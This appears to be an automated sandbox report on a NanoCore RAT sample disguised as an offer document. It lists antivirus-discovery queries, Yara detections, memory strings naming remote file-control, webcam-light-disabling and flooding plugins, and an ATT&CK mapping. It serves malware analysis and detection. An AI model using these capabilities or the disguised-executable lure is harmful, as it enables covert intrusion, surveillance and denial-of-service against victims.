Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
Source: C:\Users\user\Desktop\COMPANY PROFILE AND DOCUMENTED OFFER.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6052, type: MEMORY
Source: Yara match	File source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY
Source: Yara match	File source: 14.2.dhcpmon.exe.3db4575.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3daff4c.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3daff4c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: COMPANY PROFILE AND DOCUMENTED OFFER.exe, 00000007.00000003.841131844.0000000004AE7000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
Source: dhcpmon.exe, 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe, 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: dhcpmon.exe, 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000008.00000002.726986309.000000000410C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.673686712.000000000408C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.739875552.0000000002D61000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737080835.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.739970896.0000000003D69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6052, type: MEMORY
Source: Yara match	File source: Process Memory Space: COMPANY PROFILE AND DOCUMENTED OFFER.exe PID: 7052, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6848, type: MEMORY
Source: Yara match	File source: 14.2.dhcpmon.exe.3db4575.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3daff4c.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.414f9c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.dhcpmon.exe.414f9c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.COMPANY PROFILE AND DOCUMENTED OFFER.exe.40cf9c0.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3daff4c.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dhcpmon.exe.3dab116.5.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Scheduled Task/Job1	Process Injection111	Masquerading2	Input Capture21	Query Registry1	Remote Services	Input Capture21	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Virtualization/Sandbox Evasion3	LSASS Memory	Security Software Discovery121	Remote Desktop Protocol	Archive Collected Data11	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion3	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection111	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Deobfuscate/Decode Files or Information1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol11	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Hidden Files and Directories1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information31	DCSync	System Information Discovery12	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing13	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

